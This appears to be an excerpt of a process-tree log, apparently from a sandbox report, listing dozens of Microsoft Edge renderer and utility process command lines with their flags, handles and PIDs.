C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8560 /prefetch:112⤵PID:22744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8668 /prefetch:112⤵PID:24664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9312 /prefetch:112⤵PID:25020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9452 /prefetch:112⤵PID:25096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9344 /prefetch:112⤵PID:25288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7604 /prefetch:112⤵PID:25556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10208 /prefetch:112⤵PID:26036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:112⤵PID:26256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9372 /prefetch:112⤵PID:26768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9364 /prefetch:112⤵PID:26964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9048 /prefetch:112⤵PID:27192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:112⤵PID:27744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9700 /prefetch:112⤵PID:28004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10780 /prefetch:112⤵PID:8700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9084 /prefetch:112⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8668 /prefetch:112⤵PID:28192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10344 /prefetch:112⤵PID:28460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8576 /prefetch:112⤵PID:48136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:112⤵PID:31072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:112⤵PID:7088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10772 /prefetch:112⤵PID:31696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9532 /prefetch:112⤵PID:7956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10588 /prefetch:112⤵PID:7236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10484 /prefetch:112⤵PID:9980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10804 /prefetch:112⤵PID:10312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9888 /prefetch:112⤵PID:10756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9944 /prefetch:112⤵PID:4220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9032 /prefetch:112⤵PID:34388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:112⤵PID:32676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10560 /prefetch:112⤵PID:35932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10800 /prefetch:112⤵PID:37760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10604 /prefetch:112⤵PID:38160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1120 /prefetch:112⤵PID:38400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11244 /prefetch:112⤵PID:37356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8456 /prefetch:112⤵PID:39324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11432 /prefetch:112⤵PID:40192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10800 /prefetch:112⤵PID:39804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9108 /prefetch:112⤵PID:42356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11180 /prefetch:112⤵PID:42076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:112⤵PID:47764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9432 /prefetch:112⤵PID:50920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10996 /prefetch:112⤵PID:44640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11036 /prefetch:112⤵PID:45024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11404 /prefetch:112⤵PID:45372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1924 /prefetch:112⤵PID:46064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11104 /prefetch:112⤵PID:13452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7420 /prefetch:112⤵PID:14032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10392 /prefetch:112⤵PID:16108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8056 /prefetch:112⤵PID:45060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9196 /prefetch:112⤵PID:18460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11016 /prefetch:112⤵PID:18228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11924 /prefetch:112⤵PID:20384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11892 /prefetch:112⤵PID:51624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12480 /prefetch:112⤵PID:51908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12196 /prefetch:112⤵PID:20924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12800 /prefetch:112⤵PID:52168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12784 /prefetch:112⤵PID:21348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=12660 /prefetch:812⤵PID:21384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12348 /prefetch:112⤵PID:20696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11852 /prefetch:112⤵PID:22180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:112⤵PID:26572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9948 /prefetch:112⤵PID:26736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12852 /prefetch:112⤵PID:9760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12508 /prefetch:112⤵PID:44128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11752 /prefetch:112⤵PID:27832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=135 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13000 /prefetch:112⤵PID:1172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12684 /prefetch:112⤵PID:2032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12540 /prefetch:112⤵PID:48948
-
-
